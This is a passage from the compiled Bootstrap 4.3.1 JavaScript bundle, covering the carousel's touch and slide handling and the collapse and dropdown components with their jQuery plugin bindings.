        // ensure swiping with one touch and not pinching
        if (event.originalEvent.touches && event.originalEvent.touches.length > 1) {
          _this3.touchDeltaX = 0;
        } else {
          _this3.touchDeltaX = event.originalEvent.touches[0].clientX - _this3.touchStartX;
        }
      };

      var end = function end(event) {
        if (_this3._pointerEvent && PointerType[event.originalEvent.pointerType.toUpperCase()]) {
          _this3.touchDeltaX = event.originalEvent.clientX - _this3.touchStartX;
        }

        _this3._handleSwipe();

        if (_this3._config.pause === 'hover') {
          // If it's a touch-enabled device, mouseenter/leave are fired as
          // part of the mouse compatibility events on first tap - the carousel
          // would stop cycling until user tapped out of it;
          // here, we listen for touchend, explicitly pause the carousel
          // (as if it's the second time we tap on it, mouseenter compat event
          // is NOT fired) and after a timeout (to allow for mouse compatibility
          // events to fire) we explicitly restart cycling
          _this3.pause();

          if (_this3.touchTimeout) {
            clearTimeout(_this3.touchTimeout);
          }

          _this3.touchTimeout = setTimeout(function (event) {
            return _this3.cycle(event);
          }, TOUCHEVENT_COMPAT_WAIT + _this3._config.interval);
        }
      };

      $(this._element.querySelectorAll(Selector$2.ITEM_IMG)).on(Event$2.DRAG_START, function (e) {
        return e.preventDefault();
      });

      if (this._pointerEvent) {
        $(this._element).on(Event$2.POINTERDOWN, function (event) {
          return start(event);
        });
        $(this._element).on(Event$2.POINTERUP, function (event) {
          return end(event);
        });

        this._element.classList.add(ClassName$2.POINTER_EVENT);
      } else {
        $(this._element).on(Event$2.TOUCHSTART, function (event) {
          return start(event);
        });
        $(this._element).on(Event$2.TOUCHMOVE, function (event) {
          return move(event);
        });
        $(this._element).on(Event$2.TOUCHEND, function (event) {
          return end(event);
        });
      }
    };

    _proto._keydown = function _keydown(event) {
      if (/input|textarea/i.test(event.target.tagName)) {
        return;
      }

      switch (event.which) {
        case ARROW_LEFT_KEYCODE:
          event.preventDefault();
          this.prev();
          break;

        case ARROW_RIGHT_KEYCODE:
          event.preventDefault();
          this.next();
          break;

        default:
      }
    };

    _proto._getItemIndex = function _getItemIndex(element) {
      this._items = element && element.parentNode ? [].slice.call(element.parentNode.querySelectorAll(Selector$2.ITEM)) : [];
      return this._items.indexOf(element);
    };

    _proto._getItemByDirection = function _getItemByDirection(direction, activeElement) {
      var isNextDirection = direction === Direction.NEXT;
      var isPrevDirection = direction === Direction.PREV;

      var activeIndex = this._getItemIndex(activeElement);

      var lastItemIndex = this._items.length - 1;
      var isGoingToWrap = isPrevDirection && activeIndex === 0 || isNextDirection && activeIndex === lastItemIndex;

      if (isGoingToWrap && !this._config.wrap) {
        return activeElement;
      }

      var delta = direction === Direction.PREV ? -1 : 1;
      var itemIndex = (activeIndex + delta) % this._items.length;
      return itemIndex === -1 ? this._items[this._items.length - 1] : this._items[itemIndex];
    };

    _proto._triggerSlideEvent = function _triggerSlideEvent(relatedTarget, eventDirectionName) {
      var targetIndex = this._getItemIndex(relatedTarget);

      var fromIndex = this._getItemIndex(this._element.querySelector(Selector$2.ACTIVE_ITEM));

      var slideEvent = $.Event(Event$2.SLIDE, {
        relatedTarget: relatedTarget,
        direction: eventDirectionName,
        from: fromIndex,
        to: targetIndex
      });
      $(this._element).trigger(slideEvent);
      return slideEvent;
    };

    _proto._setActiveIndicatorElement = function _setActiveIndicatorElement(element) {
      if (this._indicatorsElement) {
        var indicators = [].slice.call(this._indicatorsElement.querySelectorAll(Selector$2.ACTIVE));
        $(indicators).removeClass(ClassName$2.ACTIVE);

        var nextIndicator = this._indicatorsElement.children[this._getItemIndex(element)];

        if (nextIndicator) {
          $(nextIndicator).addClass(ClassName$2.ACTIVE);
        }
      }
    };

    _proto._slide = function _slide(direction, element) {
      var _this4 = this;

      var activeElement = this._element.querySelector(Selector$2.ACTIVE_ITEM);

      var activeElementIndex = this._getItemIndex(activeElement);

      var nextElement = element || activeElement && this._getItemByDirection(direction, activeElement);

      var nextElementIndex = this._getItemIndex(nextElement);

      var isCycling = Boolean(this._interval);
      var directionalClassName;
      var orderClassName;
      var eventDirectionName;

      if (direction === Direction.NEXT) {
        directionalClassName = ClassName$2.LEFT;
        orderClassName = ClassName$2.NEXT;
        eventDirectionName = Direction.LEFT;
      } else {
        directionalClassName = ClassName$2.RIGHT;
        orderClassName = ClassName$2.PREV;
        eventDirectionName = Direction.RIGHT;
      }

      if (nextElement && $(nextElement).hasClass(ClassName$2.ACTIVE)) {
        this._isSliding = false;
        return;
      }

      var slideEvent = this._triggerSlideEvent(nextElement, eventDirectionName);

      if (slideEvent.isDefaultPrevented()) {
        return;
      }

      if (!activeElement || !nextElement) {
        // Some weirdness is happening, so we bail
        return;
      }

      this._isSliding = true;

      if (isCycling) {
        this.pause();
      }

      this._setActiveIndicatorElement(nextElement);

      var slidEvent = $.Event(Event$2.SLID, {
        relatedTarget: nextElement,
        direction: eventDirectionName,
        from: activeElementIndex,
        to: nextElementIndex
      });

      if ($(this._element).hasClass(ClassName$2.SLIDE)) {
        $(nextElement).addClass(orderClassName);
        Util.reflow(nextElement);
        $(activeElement).addClass(directionalClassName);
        $(nextElement).addClass(directionalClassName);
        var nextElementInterval = parseInt(nextElement.getAttribute('data-interval'), 10);

        if (nextElementInterval) {
          this._config.defaultInterval = this._config.defaultInterval || this._config.interval;
          this._config.interval = nextElementInterval;
        } else {
          this._config.interval = this._config.defaultInterval || this._config.interval;
        }

        var transitionDuration = Util.getTransitionDurationFromElement(activeElement);
        $(activeElement).one(Util.TRANSITION_END, function () {
          $(nextElement).removeClass(directionalClassName + " " + orderClassName).addClass(ClassName$2.ACTIVE);
          $(activeElement).removeClass(ClassName$2.ACTIVE + " " + orderClassName + " " + directionalClassName);
          _this4._isSliding = false;
          setTimeout(function () {
            return $(_this4._element).trigger(slidEvent);
          }, 0);
        }).emulateTransitionEnd(transitionDuration);
      } else {
        $(activeElement).removeClass(ClassName$2.ACTIVE);
        $(nextElement).addClass(ClassName$2.ACTIVE);
        this._isSliding = false;
        $(this._element).trigger(slidEvent);
      }

      if (isCycling) {
        this.cycle();
      }
    } // Static
    ;

    Carousel._jQueryInterface = function _jQueryInterface(config) {
      return this.each(function () {
        var data = $(this).data(DATA_KEY$2);

        var _config = _objectSpread({}, Default, $(this).data());

        if (typeof config === 'object') {
          _config = _objectSpread({}, _config, config);
        }

        var action = typeof config === 'string' ? config : _config.slide;

        if (!data) {
          data = new Carousel(this, _config);
          $(this).data(DATA_KEY$2, data);
        }

        if (typeof config === 'number') {
          data.to(config);
        } else if (typeof action === 'string') {
          if (typeof data[action] === 'undefined') {
            throw new TypeError("No method named \"" + action + "\"");
          }

          data[action]();
        } else if (_config.interval && _config.ride) {
          data.pause();
          data.cycle();
        }
      });
    };

    Carousel._dataApiClickHandler = function _dataApiClickHandler(event) {
      var selector = Util.getSelectorFromElement(this);

      if (!selector) {
        return;
      }

      var target = $(selector)[0];

      if (!target || !$(target).hasClass(ClassName$2.CAROUSEL)) {
        return;
      }

      var config = _objectSpread({}, $(target).data(), $(this).data());

      var slideIndex = this.getAttribute('data-slide-to');

      if (slideIndex) {
        config.interval = false;
      }

      Carousel._jQueryInterface.call($(target), config);

      if (slideIndex) {
        $(target).data(DATA_KEY$2).to(slideIndex);
      }

      event.preventDefault();
    };

    _createClass(Carousel, null, [{
      key: "VERSION",
      get: function get() {
        return VERSION$2;
      }
    }, {
      key: "Default",
      get: function get() {
        return Default;
      }
    }]);

    return Carousel;
  }();
  /**
   * ------------------------------------------------------------------------
   * Data Api implementation
   * ------------------------------------------------------------------------
   */


  $(document).on(Event$2.CLICK_DATA_API, Selector$2.DATA_SLIDE, Carousel._dataApiClickHandler);
  $(window).on(Event$2.LOAD_DATA_API, function () {
    var carousels = [].slice.call(document.querySelectorAll(Selector$2.DATA_RIDE));

    for (var i = 0, len = carousels.length; i < len; i++) {
      var $carousel = $(carousels[i]);

      Carousel._jQueryInterface.call($carousel, $carousel.data());
    }
  });
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */

  $.fn[NAME$2] = Carousel._jQueryInterface;
  $.fn[NAME$2].Constructor = Carousel;

  $.fn[NAME$2].noConflict = function () {
    $.fn[NAME$2] = JQUERY_NO_CONFLICT$2;
    return Carousel._jQueryInterface;
  };

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME$3 = 'collapse';
  var VERSION$3 = '4.3.1';
  var DATA_KEY$3 = 'bs.collapse';
  var EVENT_KEY$3 = "." + DATA_KEY$3;
  var DATA_API_KEY$3 = '.data-api';
  var JQUERY_NO_CONFLICT$3 = $.fn[NAME$3];
  var Default$1 = {
    toggle: true,
    parent: ''
  };
  var DefaultType$1 = {
    toggle: 'boolean',
    parent: '(string|element)'
  };
  var Event$3 = {
    SHOW: "show" + EVENT_KEY$3,
    SHOWN: "shown" + EVENT_KEY$3,
    HIDE: "hide" + EVENT_KEY$3,
    HIDDEN: "hidden" + EVENT_KEY$3,
    CLICK_DATA_API: "click" + EVENT_KEY$3 + DATA_API_KEY$3
  };
  var ClassName$3 = {
    SHOW: 'show',
    COLLAPSE: 'collapse',
    COLLAPSING: 'collapsing',
    COLLAPSED: 'collapsed'
  };
  var Dimension = {
    WIDTH: 'width',
    HEIGHT: 'height'
  };
  var Selector$3 = {
    ACTIVES: '.show, .collapsing',
    DATA_TOGGLE: '[data-toggle="collapse"]'
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var Collapse =
  /*#__PURE__*/
  function () {
    function Collapse(element, config) {
      this._isTransitioning = false;
      this._element = element;
      this._config = this._getConfig(config);
      this._triggerArray = [].slice.call(document.querySelectorAll("[data-toggle=\"collapse\"][href=\"#" + element.id + "\"]," + ("[data-toggle=\"collapse\"][data-target=\"#" + element.id + "\"]")));
      var toggleList = [].slice.call(document.querySelectorAll(Selector$3.DATA_TOGGLE));

      for (var i = 0, len = toggleList.length; i < len; i++) {
        var elem = toggleList[i];
        var selector = Util.getSelectorFromElement(elem);
        var filterElement = [].slice.call(document.querySelectorAll(selector)).filter(function (foundElem) {
          return foundElem === element;
        });

        if (selector !== null && filterElement.length > 0) {
          this._selector = selector;

          this._triggerArray.push(elem);
        }
      }

      this._parent = this._config.parent ? this._getParent() : null;

      if (!this._config.parent) {
        this._addAriaAndCollapsedClass(this._element, this._triggerArray);
      }

      if (this._config.toggle) {
        this.toggle();
      }
    } // Getters


    var _proto = Collapse.prototype;

    // Public
    _proto.toggle = function toggle() {
      if ($(this._element).hasClass(ClassName$3.SHOW)) {
        this.hide();
      } else {
        this.show();
      }
    };

    _proto.show = function show() {
      var _this = this;

      if (this._isTransitioning || $(this._element).hasClass(ClassName$3.SHOW)) {
        return;
      }

      var actives;
      var activesData;

      if (this._parent) {
        actives = [].slice.call(this._parent.querySelectorAll(Selector$3.ACTIVES)).filter(function (elem) {
          if (typeof _this._config.parent === 'string') {
            return elem.getAttribute('data-parent') === _this._config.parent;
          }

          return elem.classList.contains(ClassName$3.COLLAPSE);
        });

        if (actives.length === 0) {
          actives = null;
        }
      }

      if (actives) {
        activesData = $(actives).not(this._selector).data(DATA_KEY$3);

        if (activesData && activesData._isTransitioning) {
          return;
        }
      }

      var startEvent = $.Event(Event$3.SHOW);
      $(this._element).trigger(startEvent);

      if (startEvent.isDefaultPrevented()) {
        return;
      }

      if (actives) {
        Collapse._jQueryInterface.call($(actives).not(this._selector), 'hide');

        if (!activesData) {
          $(actives).data(DATA_KEY$3, null);
        }
      }

      var dimension = this._getDimension();

      $(this._element).removeClass(ClassName$3.COLLAPSE).addClass(ClassName$3.COLLAPSING);
      this._element.style[dimension] = 0;

      if (this._triggerArray.length) {
        $(this._triggerArray).removeClass(ClassName$3.COLLAPSED).attr('aria-expanded', true);
      }

      this.setTransitioning(true);

      var complete = function complete() {
        $(_this._element).removeClass(ClassName$3.COLLAPSING).addClass(ClassName$3.COLLAPSE).addClass(ClassName$3.SHOW);
        _this._element.style[dimension] = '';

        _this.setTransitioning(false);

        $(_this._element).trigger(Event$3.SHOWN);
      };

      var capitalizedDimension = dimension[0].toUpperCase() + dimension.slice(1);
      var scrollSize = "scroll" + capitalizedDimension;
      var transitionDuration = Util.getTransitionDurationFromElement(this._element);
      $(this._element).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);
      this._element.style[dimension] = this._element[scrollSize] + "px";
    };

    _proto.hide = function hide() {
      var _this2 = this;

      if (this._isTransitioning || !$(this._element).hasClass(ClassName$3.SHOW)) {
        return;
      }

      var startEvent = $.Event(Event$3.HIDE);
      $(this._element).trigger(startEvent);

      if (startEvent.isDefaultPrevented()) {
        return;
      }

      var dimension = this._getDimension();

      this._element.style[dimension] = this._element.getBoundingClientRect()[dimension] + "px";
      Util.reflow(this._element);
      $(this._element).addClass(ClassName$3.COLLAPSING).removeClass(ClassName$3.COLLAPSE).removeClass(ClassName$3.SHOW);
      var triggerArrayLength = this._triggerArray.length;

      if (triggerArrayLength > 0) {
        for (var i = 0; i < triggerArrayLength; i++) {
          var trigger = this._triggerArray[i];
          var selector = Util.getSelectorFromElement(trigger);

          if (selector !== null) {
            var $elem = $([].slice.call(document.querySelectorAll(selector)));

            if (!$elem.hasClass(ClassName$3.SHOW)) {
              $(trigger).addClass(ClassName$3.COLLAPSED).attr('aria-expanded', false);
            }
          }
        }
      }

      this.setTransitioning(true);

      var complete = function complete() {
        _this2.setTransitioning(false);

        $(_this2._element).removeClass(ClassName$3.COLLAPSING).addClass(ClassName$3.COLLAPSE).trigger(Event$3.HIDDEN);
      };

      this._element.style[dimension] = '';
      var transitionDuration = Util.getTransitionDurationFromElement(this._element);
      $(this._element).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);
    };

    _proto.setTransitioning = function setTransitioning(isTransitioning) {
      this._isTransitioning = isTransitioning;
    };

    _proto.dispose = function dispose() {
      $.removeData(this._element, DATA_KEY$3);
      this._config = null;
      this._parent = null;
      this._element = null;
      this._triggerArray = null;
      this._isTransitioning = null;
    } // Private
    ;

    _proto._getConfig = function _getConfig(config) {
      config = _objectSpread({}, Default$1, config);
      config.toggle = Boolean(config.toggle); // Coerce string values

      Util.typeCheckConfig(NAME$3, config, DefaultType$1);
      return config;
    };

    _proto._getDimension = function _getDimension() {
      var hasWidth = $(this._element).hasClass(Dimension.WIDTH);
      return hasWidth ? Dimension.WIDTH : Dimension.HEIGHT;
    };

    _proto._getParent = function _getParent() {
      var _this3 = this;

      var parent;

      if (Util.isElement(this._config.parent)) {
        parent = this._config.parent; // It's a jQuery object

        if (typeof this._config.parent.jquery !== 'undefined') {
          parent = this._config.parent[0];
        }
      } else {
        parent = document.querySelector(this._config.parent);
      }

      var selector = "[data-toggle=\"collapse\"][data-parent=\"" + this._config.parent + "\"]";
      var children = [].slice.call(parent.querySelectorAll(selector));
      $(children).each(function (i, element) {
        _this3._addAriaAndCollapsedClass(Collapse._getTargetFromElement(element), [element]);
      });
      return parent;
    };

    _proto._addAriaAndCollapsedClass = function _addAriaAndCollapsedClass(element, triggerArray) {
      var isOpen = $(element).hasClass(ClassName$3.SHOW);

      if (triggerArray.length) {
        $(triggerArray).toggleClass(ClassName$3.COLLAPSED, !isOpen).attr('aria-expanded', isOpen);
      }
    } // Static
    ;

    Collapse._getTargetFromElement = function _getTargetFromElement(element) {
      var selector = Util.getSelectorFromElement(element);
      return selector ? document.querySelector(selector) : null;
    };

    Collapse._jQueryInterface = function _jQueryInterface(config) {
      return this.each(function () {
        var $this = $(this);
        var data = $this.data(DATA_KEY$3);

        var _config = _objectSpread({}, Default$1, $this.data(), typeof config === 'object' && config ? config : {});

        if (!data && _config.toggle && /show|hide/.test(config)) {
          _config.toggle = false;
        }

        if (!data) {
          data = new Collapse(this, _config);
          $this.data(DATA_KEY$3, data);
        }

        if (typeof config === 'string') {
          if (typeof data[config] === 'undefined') {
            throw new TypeError("No method named \"" + config + "\"");
          }

          data[config]();
        }
      });
    };

    _createClass(Collapse, null, [{
      key: "VERSION",
      get: function get() {
        return VERSION$3;
      }
    }, {
      key: "Default",
      get: function get() {
        return Default$1;
      }
    }]);

    return Collapse;
  }();
  /**
   * ------------------------------------------------------------------------
   * Data Api implementation
   * ------------------------------------------------------------------------
   */


  $(document).on(Event$3.CLICK_DATA_API, Selector$3.DATA_TOGGLE, function (event) {
    // preventDefault only for <a> elements (which change the URL) not inside the collapsible element
    if (event.currentTarget.tagName === 'A') {
      event.preventDefault();
    }

    var $trigger = $(this);
    var selector = Util.getSelectorFromElement(this);
    var selectors = [].slice.call(document.querySelectorAll(selector));
    $(selectors).each(function () {
      var $target = $(this);
      var data = $target.data(DATA_KEY$3);
      var config = data ? 'toggle' : $trigger.data();

      Collapse._jQueryInterface.call($target, config);
    });
  });
  /**
   * ------------------------------------------------------------------------
   * jQuery
   * ------------------------------------------------------------------------
   */

  $.fn[NAME$3] = Collapse._jQueryInterface;
  $.fn[NAME$3].Constructor = Collapse;

  $.fn[NAME$3].noConflict = function () {
    $.fn[NAME$3] = JQUERY_NO_CONFLICT$3;
    return Collapse._jQueryInterface;
  };

  /**
   * ------------------------------------------------------------------------
   * Constants
   * ------------------------------------------------------------------------
   */

  var NAME$4 = 'dropdown';
  var VERSION$4 = '4.3.1';
  var DATA_KEY$4 = 'bs.dropdown';
  var EVENT_KEY$4 = "." + DATA_KEY$4;
  var DATA_API_KEY$4 = '.data-api';
  var JQUERY_NO_CONFLICT$4 = $.fn[NAME$4];
  var ESCAPE_KEYCODE = 27; // KeyboardEvent.which value for Escape (Esc) key

  var SPACE_KEYCODE = 32; // KeyboardEvent.which value for space key

  var TAB_KEYCODE = 9; // KeyboardEvent.which value for tab key

  var ARROW_UP_KEYCODE = 38; // KeyboardEvent.which value for up arrow key

  var ARROW_DOWN_KEYCODE = 40; // KeyboardEvent.which value for down arrow key

  var RIGHT_MOUSE_BUTTON_WHICH = 3; // MouseEvent.which value for the right button (assuming a right-handed mouse)

  var REGEXP_KEYDOWN = new RegExp(ARROW_UP_KEYCODE + "|" + ARROW_DOWN_KEYCODE + "|" + ESCAPE_KEYCODE);
  var Event$4 = {
    HIDE: "hide" + EVENT_KEY$4,
    HIDDEN: "hidden" + EVENT_KEY$4,
    SHOW: "show" + EVENT_KEY$4,
    SHOWN: "shown" + EVENT_KEY$4,
    CLICK: "click" + EVENT_KEY$4,
    CLICK_DATA_API: "click" + EVENT_KEY$4 + DATA_API_KEY$4,
    KEYDOWN_DATA_API: "keydown" + EVENT_KEY$4 + DATA_API_KEY$4,
    KEYUP_DATA_API: "keyup" + EVENT_KEY$4 + DATA_API_KEY$4
  };
  var ClassName$4 = {
    DISABLED: 'disabled',
    SHOW: 'show',
    DROPUP: 'dropup',
    DROPRIGHT: 'dropright',
    DROPLEFT: 'dropleft',
    MENURIGHT: 'dropdown-menu-right',
    MENULEFT: 'dropdown-menu-left',
    POSITION_STATIC: 'position-static'
  };
  var Selector$4 = {
    DATA_TOGGLE: '[data-toggle="dropdown"]',
    FORM_CHILD: '.dropdown form',
    MENU: '.dropdown-menu',
    NAVBAR_NAV: '.navbar-nav',
    VISIBLE_ITEMS: '.dropdown-menu .dropdown-item:not(.disabled):not(:disabled)'
  };
  var AttachmentMap = {
    TOP: 'top-start',
    TOPEND: 'top-end',
    BOTTOM: 'bottom-start',
    BOTTOMEND: 'bottom-end',
    RIGHT: 'right-start',
    RIGHTEND: 'right-end',
    LEFT: 'left-start',
    LEFTEND: 'left-end'
  };
  var Default$2 = {
    offset: 0,
    flip: true,
    boundary: 'scrollParent',
    reference: 'toggle',
    display: 'dynamic'
  };
  var DefaultType$2 = {
    offset: '(number|string|function)',
    flip: 'boolean',
    boundary: '(string|element)',
    reference: '(string|element)',
    display: 'string'
    /**
     * ------------------------------------------------------------------------
     * Class Definition
     * ------------------------------------------------------------------------
     */

  };

  var Dropdown =
  /*#__PURE__*/
  function () {
    function Dropdown(element, config) {
      this._element = element;
      this._popper = null;
      this._config = this._getConfig(config);
      this._menu = this._getMenuElement();
      this._inNavbar = this._detectNavbar();

      this._addEventListeners();
    } // Getters


    var _proto = Dropdown.prototype;

    // Public
    _proto.toggle = function toggle() {
      if (this._element.disabled || $(this._element).hasClass(ClassName$4.DISABLED)) {
        return;
      }

      var parent = Dropdown._getParentFromElement(this._element);

      var isActive = $(this._menu).hasClass(ClassName$4.SHOW);

      Dropdown._clearMenus();

      if (isActive) {
        return;
      }

      var relatedTarget = {
        relatedTarget: this._element
      };
      var showEvent = $.Event(Event$4.SHOW, relatedTarget);
      $(parent).trigger(showEvent);

      if (showEvent.isDefaultPrevented()) {
        return;
      } // Disable totally Popper.js for Dropdown in Navbar


      if (!this._inNavbar) {
        /**
         * Check for Popper dependency
         * Popper - https://popper.js.org
         */
        if (typeof Popper === 'undefined') {
          throw new TypeError('Bootstrap\'s dropdowns require Popper.js (https://popper.js.org/)');
        }

        var referenceElement = this._element;

        if (this._config.reference === 'parent') {
          referenceElement = parent;
        } else if (Util.isElement(this._config.reference)) {
          referenceElement = this._config.reference; // Check if it's jQuery element

          if (typeof this._config.reference.jquery !== 'undefined') {
            referenceElement = this._config.reference[0];
          }
        } // If boundary is not `scrollParent`, then set position to `static`
        // to allow the menu to "escape" the scroll parent's boundaries
        // https://github.com/twbs/bootstrap/issues/24251


        if (this._config.boundary !== 'scrollParent') {
          $(parent).addClass(ClassName$4.POSITION_STATIC);
        }

        this._popper = new Popper(referenceElement, this._menu, this._getPopperConfig());
      } // If this is a touch-enabled device we add extra
      // empty mouseover listeners to the body's immediate children;
      // only needed because of broken event delegation on iOS
      // https://www.quirksmode.org/blog/archives/2014/02/mouse_event_bub.html


      if ('ontouchstart' in document.documentElement && $(parent).closest(Selector$4.NAVBAR_NAV).length === 0) {
        $(document.body).children().on('mouseover', null, $.noop);
      }

      this._element.focus();

      this._element.setAttribute('aria-expanded', true);

      $(this._menu).toggleClass(ClassName$4.SHOW);
      $(parent).toggleClass(ClassName$4.SHOW).trigger($.Event(Event$4.SHOWN, relatedTarget));
    };

    _proto.show = function show() {
      if (this._element.disabled || $(this._element).hasClass(ClassName$4.DISABLED) || $(this._menu).hasClass(ClassName$4.SHOW)) {
        return;
      }

      var relatedTarget = {
        relatedTarget: this._element
      };
      var showEvent = $.Event(Event$4.SHOW, relatedTarget);

      var parent = Dropdown._getParentFromElement(this._element);

      $(parent).trigger(showEvent);

      if (showEvent.isDefaultPrevented()) {
        return;
      }

      $(this._menu).toggleClass(ClassName$4.SHOW);
      $(parent).toggleClass(ClassName$4.SHOW).trigger($.Event(Event$4.SHOWN, relatedTarget));
    };

    _proto.hide = function hide() {
      if (this._element.disabled || $(this._element).hasClass(ClassName$4.DISABLED) || !$(this._menu).hasClass(ClassName$4.SHOW)) {
        return;
      }

      var relatedTarget = {
        relatedTarget: this._element
      };
      var hideEvent = $.Event(Event$4.HIDE, relatedTarget);

      var parent = Dropdown._getParentFromElement(this._element);

      $(parent).trigger(hideEvent);

      if (hideEvent.isDefaultPrevented()) {
        return;
      }

      $(this._menu).toggleClass(ClassName$4.SHOW);
      $(parent).toggleClass(ClassName$4.SHOW).trigger($.Event(Event$4.HIDDEN, relatedTarget));
    };

    _proto.dispose = function dispose() {
      $.removeData(this._element, DATA_KEY$4);
      $(this._element).off(EVENT_KEY$4);
      this._element = null;
      this._menu = null;

      if (this._popper !== null) {
        this._popper.destroy();

        this._popper = null;
      }
    };

    _proto.update = function update() {
      this._inNavbar = this._detectNavbar();

      if (this._popper !== null) {
        this._popper.scheduleUpdate();
      }
    } // Private
    ;

    _proto._addEventListeners = function _addEventListeners() {
      var _this = this;

      $(this._element).on(Event$4.CLICK, function (event) {
        event.preventDefault();
        event.stopPropagation();

        _this.toggle();
      });
    };

    _proto._getConfig = function _getConfig(config) {
      config = _objectSpread({}, this.constructor.Default, $(this._element).data(), config);
      Util.typeCheckConfig(NAME$4, config, this.constructor.DefaultType);
      return config;
    };

    _proto._getMenuElement = function _getMenuElement() {
      if (!this._menu) {
        var parent = Dropdown._getParentFromElement(this._element);

        if (parent) {
          this._menu = parent.querySelector(Selector$4.MENU);
        }
      }

      return this._menu;
    };

    _proto._getPlacement = function _getPlacement() {
      var $parentDropdown = $(this._element.parentNode);
      var placement = AttachmentMap.BOTTOM; // Handle dropup

      if ($parentDropdown.hasClass(ClassName$4.DROPUP)) {
        placement = AttachmentMap.TOP;

        if ($(this._menu).hasClass(ClassName$4.MENURIGHT)) {
          placement = AttachmentMap.TOPEND;
        }
      } else if ($parentDropdown.hasClass(ClassName$4.DROPRIGHT)) {
        placement = AttachmentMap.RIGHT;
      } else if ($parentDropdown.hasClass(ClassName$4.DROPLEFT)) {
        placement = AttachmentMap.LEFT;
      } else if ($(this._menu).hasClass(ClassName$4.MENURIGHT)) {
        placement = AttachmentMap.BOTTOMEND;
      }

      return placement;
    };

    _proto._detectNavbar = function _detectNavbar() {
      return $(this._element).closest('.navbar').length > 0;
    };

    _proto._getOffset = function _getOffset() {
      var _this2 = this;

      var offset = {};

      if (typeof this._config.offset === 'function') {
        offset.fn = function (data) {
          data.offsets = _objectSpread({}, data.offsets, _this2._config.offset(data.offsets, _this2._element) || {});
          return data;
        };
      } else {
        offset.offset = this._config.offset;
      }

      return offset;
    };

    _proto._getPopperConfig = function _getPopperConfig() {
      var popperConfig = {
        placement: this._getPlacement(),
        modifiers: {
          offset: this._getOffset(),
          flip: {
            enabled: this._config.flip
          },
          preventOverflow: {
            boundariesElement: this._config.boundary
          }
        } // Disable Popper.js if we have a static display

      };

      if (this._config.display === 'static') {
        popperConfig.modifiers.applyStyle = {
          enabled: false
        };
      }

      return popperConfig;
    } // Static
    ;

    Dropdown._jQueryInterface = function _jQueryInterface(config) {
      return this.each(function () {
        var data = $(this).data(DATA_KEY$4);

        var _config = typeof config === 'object' ? config : null;

        if (!data) {
          data = new Dropdown(this, _config);
          $(this).data(DATA_KEY$4, data);
        }

        if (typeof config === 'string') {
          if (typeof data[config] === 'undefined') {
            throw new TypeError("No method named \"" + config + "\"");
          }

          data[config]();
        }
      });
    };

    Dropdown._clearMenus = function _clearMenus(event) {
      if (event && (event.which === RIGHT_MOUSE_BUTTON_WHICH || event.type === 'keyup' && event.which !== TAB_KEYCODE)) {
        return;
      }

      var toggles = [].slice.call(document.querySelectorAll(Selector$4.DATA_TOGGLE));

      for (var i = 0, len = toggles.length; i < len; i++) {
        var parent = Dropdown._getParentFromElement(toggles[i]);

        var context = $(toggles[i]).data(DATA_KEY$4);
        var relatedTarget = {
          relatedTarget: toggles[i]
        };

        if (event && event.type === 'click') {
          relatedTarget.clickEvent = event;
        }

        if (!context) {
          continue;
        }

        var dropdownMenu = context._menu;

        if (!$(parent).hasClass(ClassName$4.SHOW)) {
          continue;
        }

        if (event && (event.type === 'click' && /input|textarea/i.test(event.target.tagName) || event.type === 'keyup' && event.which === TAB_KEYCODE) && $.contains(parent, event.target)) {
          continue;
        }

        var hideEvent = $.Event(Event$4.HIDE, relatedTarget);
        $(parent).trigger(hideEvent);

        if (hideEvent.isDefaultPrevented()) {
          continue;
        } // If this is a touch-enabled device we remove the extra
        // empty mouseover listeners we added for iOS support


        if ('ontouchstart' in document.documentElement) {
          $(document.body).children().off('mouseover', null, $.noop);
        }

        toggles[i].setAttribute('aria-expanded', 'false');
        $(dropdownMenu).removeClass(ClassName$4.SHOW);
        $(parent).removeClass(ClassName$4.SHOW).trigger($.Event(Event$4.HIDDEN, relatedTarget));
      }
    };

    Dropdown._getParentFromElement = function _getParentFromElement(element) {
      var parent;
      var selector = Util.getSelectorFromElement(element);

      if (selector) {
        parent = document.querySelector(selector);
      }

      return parent || element.parentNode;
    } // eslint-disable-next-line complexity
    ;

    Dropdown._dataApiKeydownHandler = function _dataApiKeydownHandler(event) {
      // If not input/textarea:
      //  - And not a key in REGEXP_KEYDOWN => not a dropdown command
      // If input/textarea:
      //  - If space key => not a dropdown command
      //  - If key is other than escape
      //    - If key is not up or down => not a dropdown command
      //    - If trigger inside the menu => not a dropdown command
      if (/input|textarea/i.test(event.target.tagName) ? event.which === SPACE_KEYCODE || event.which !== ESCAPE_KEYCODE && (event.which !== ARROW_DOWN_KEYCODE && event.which !== ARROW_UP_KEYCODE || $(event.target).closest(Selector$4.MENU).length) : !REGEXP_KEYDOWN.test(event.which)) {
        return;
      }

      event.preventDefault();
      event.stopPropagation();

      if (this.disabled || $(this).hasClass(ClassName$4.DISABLED)) {
        return;
      }

      var parent = Dropdown._getParentFromElement(this);

      var isActive = $(parent).hasClass(ClassName$4.SHOW);

      if (!isActive || isActive && (event.which === ESCAPE_KEYCODE || event.which === SPACE_KEYCODE)) {
        if (event.which === ESCAPE_KEYCODE) {
          var toggle = parent.querySelector(Selector$4.DATA_TOGGLE);
          $(toggle).trigger('focus');
        }

        $(this).trigger('click');
        return;
      }

      var items = [].slice.call(parent.querySelectorAll(Selector$4.VISIBLE_ITEMS));

      if (items.length === 0) {
        return;
      }

      var index = items.indexOf(event.target);

      if (event.which === ARROW_UP_KEYCODE && index > 0) {
        // Up
        index--;
      }

      if (event.which === ARROW_DOWN_KEYCODE && index < items.length - 1) {
        // Down
        index++;
      }

      if (index < 0) {
        index = 0;
      }

      items[index].focus();
    };

    _createClass(Dropdown, null, [{
      key: "VERSION",
      get: function get() {
        return VERSION$4;
      }
    }, {
      key: "Default",
      get: function get() {
        return Default$2;
      }
    }, {
      key: "DefaultType",
      get: function get() {
        return DefaultType$2;
      }
    }]);

    return Dropdown;
  }();
  /**
   * ------------------------------------------------------------------------
   * Data Api implementation
   * ------------------------------------------------------------------------
   */


